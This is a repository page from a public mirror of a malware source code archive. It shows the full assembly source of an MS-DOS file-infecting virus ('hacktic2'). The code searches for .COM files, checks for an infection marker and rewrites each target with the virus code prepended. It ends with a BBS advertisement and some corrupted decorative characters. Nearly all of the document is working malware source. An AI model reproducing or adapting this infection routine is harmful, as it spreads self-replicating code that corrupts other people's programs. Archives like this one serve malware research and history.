Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 16:38:38 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/H-Index/Virus.MSDOS.Unknown.hacktic2.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

64 lines
2.6 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset last-100h ;LENGTH OF VIRUS CODE
;
start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR
mov ah,4ah
int 21h
mov dx,es
add dh,10h
mov es,dx ;PROGRAM CODE WILL RUN HERE
push dx ;SET UP FOR FAR RETURN
push si
mov ah,26h ;CREATE NEW PSP
int 21h
mov di,si
mov si,offset last
push si
mov ch,0feh
rep movsb ;MOVE PROGRAM CODE UP
dec cx ;=FFFF
pop di
mov dx,offset file
mov ah,4eh ;FIND FIRST .COM FILE
jmp short find
retry: mov ah,4fh ;FIND NEXT
find: int 21h
jc nofile ;NO (MORE) FILES
mov dx,9eh ;FILE NAME IN DTA
mov ax,3d02h ;OPEN FILE
int 21h
xchg ax,bx ;1-BYTE MOVE OF AXBX
mov dx,di ;END OF VIRUS CODE
mov ah,3fh ;READ FILE DATA (CX=FFFF)
int 21h ;READ FILE AFTER VIRUS CODE
add ax,len ;LENGTH OF VIRUS+FILE
cmp byte ptr [di],0bbh ;CHECK IF ALREADY INFECTED
je retry ;TRY AGAIN
push ax
xor cx,cx
mov ax,4200h ;RESET FILE POINTER
cwd ;DX=0
int 21h
pop cx
mov dh,1
mov ah,40h ;WRITE INFECTED CODE BACK
int 21h
;
nofile: push es ;GO RUN PROGRAM
pop ds
retf
;
file db '*.COM',0 ;SEARCH FOR .COM FILES
last db 0c3h ;STANDALONE VIRUS CODE JUST RETURNS
tic ends
end start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
View Git Blame Copy Permalink